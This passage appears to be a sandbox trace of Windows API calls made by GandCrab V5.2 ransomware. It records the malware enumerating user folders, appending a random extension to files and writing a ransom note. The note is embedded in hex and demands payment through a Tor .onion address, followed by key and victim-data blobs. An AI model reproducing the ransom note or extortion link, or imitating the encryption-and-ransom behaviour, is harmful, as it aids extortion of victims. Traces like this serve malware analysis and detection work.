returned="C:\\Users\\d2ca4a09d2ca4deb61a.lock" [0096.101] lstrlenW (lpString=".titwmvjl") returned 9 [0096.101] lstrlenW (lpString="C:\\Users\\d2ca4a09d2ca4deb61a.lock") returned 33 [0096.101] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.101] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 42 [0096.101] lstrlenW (lpString="C:\\Users\\d2ca4a09d2ca4deb61a.lock") returned 33 [0096.101] lstrlenW (lpString=".lock") returned 5 [0096.101] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.101] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.101] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.101] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.101] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0096.101] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0096.101] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0096.102] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0096.102] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0096.102] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.102] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.102] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.102] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.103] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.103] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.103] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.103] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\\\TITWMVJL-DECRYPT.txt") returned 38 [0096.103] CreateFileW (lpFileName="C:\\Users\\Default\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0096.104] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77